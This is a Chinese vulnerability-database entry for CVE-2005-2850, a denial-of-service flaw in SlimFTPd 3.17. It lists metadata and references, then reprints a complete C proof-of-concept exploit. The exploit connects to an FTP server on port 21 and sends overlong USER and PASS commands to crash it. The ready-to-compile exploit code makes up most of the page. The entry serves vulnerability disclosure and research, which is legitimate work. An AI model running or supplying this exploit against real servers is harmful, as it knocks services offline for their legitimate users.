SlimFTPd拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109050 漏洞类型 缓冲区溢出
发布时间 2005-09-02 更新时间 2005-09-08
CVE编号 CVE-2005-2850 CNNVD-ID CNNVD-200509-083
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/26219
https://www.securityfocus.com/bid/89329
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-083
|漏洞详情
SlimFTPd是一个小型的FTP服务器工具,完全支持多线程技术,具有绝大部分常用的功能,而体积非常小巧。SlimFTPd3.17版允许远程攻击者通过以下命令触发服务拒绝(崩溃):(1)USER命令;(2)PASS命令,可能由缓存溢出或差一错误引起。
|漏洞EXP
source: http://www.securityfocus.com/bid/14723/info

SlimFTPd is prone to a remote denial of service vulnerability. This issue is due to a failure in the application to handle exceptional conditions.

The problem presents itself during login. The application fails to handle malicious input in a proper manner resulting in a crash of the server, thus denying service to legitimate users. 

/*

Slim FTPd 3.17 Remote DoS PoC Exploit

Public proof of concept code by "Critical Security" http://www.critical.lt

Use for education only! Don't break the law...

Original Advisory may be found here: http://www.critical.lt/?vulnerabilities/8
Exploit compiles without warnings on FreeBSD 5.4-RELEASE
Tested against Slim FTPd 3.17 on Windows XP SP 2

Compilation:

mircia$ uname -sr
FreeBSD 5.4-RELEASE-p6
mircia$ gcc this_file.c -o expl
mircia$ ./expl localhost
here goes output

*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 21
#define USER "USER aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n"  //
#define PASS "PASS aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n" // Our dirty requests ;) 
#define QUIT "QUIT" // after all we just quit                    

int main(int argc, char *argv[]) {
  register int s;
  register int bytes;
  struct sockaddr_in sa;
  struct hostent *he;
  char buf[BUFSIZ+1];
  char *host;
  
  if ((s = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
    perror("pizute");
    return 1;
  }

  bzero(&sa, sizeof sa);

  sa.sin_family = AF_INET;
  
  if (argc <= 1) {
  
  
  printf("%s%s%s","Usage: ",argv[0]," hostname or ip\n\n");
  
   } else {   
 
  host = (char *)argv[1];
  sa.sin_port = htons(PORT);

  if ((he = gethostbyname(host)) == NULL) {
    perror(host);
    return 2;
  }
  
  printf ("%s","\nCritical Security web-site: http://www.critical.lt\n");
  printf ("%s","Slim FTPd 3.17 lame PoC DoS exploit.\n");
  printf ("%s","greets to Lithuanian girlz :)\n\n"); 
  printf ("%s%s%s","[*] Initiating attack against ",host, "\n");
 
    bcopy(he->h_addr_list[0],&sa.sin_addr, he->h_length);

  if (connect(s, (struct sockaddr *)&sa, sizeof sa) < 0) {
    perror("connect");
    return 3;
  }

write(s,USER,sizeof USER); // dirty dirty dirty...
write(s,PASS,sizeof PASS);
write(s,QUIT,sizeof QUIT);

printf("%s","[*] Stuff sent, now wait for 30-120 seconds,\nserver should crash, if's not - try again or write a better code :P\n");



  close(s);
  return 0;

}}
|受影响的产品
Whitsoft Development Slimftpd 3.17
|参考资料

来源:MISC
链接:http://www.critical.lt/research/slimftpd_dos2.c
来源:MISC
链接:http://www.critical.lt/?vulnerabilities/8
来源:SECTRACK
名称:1014831
链接:http://securitytracker.com/id?1014831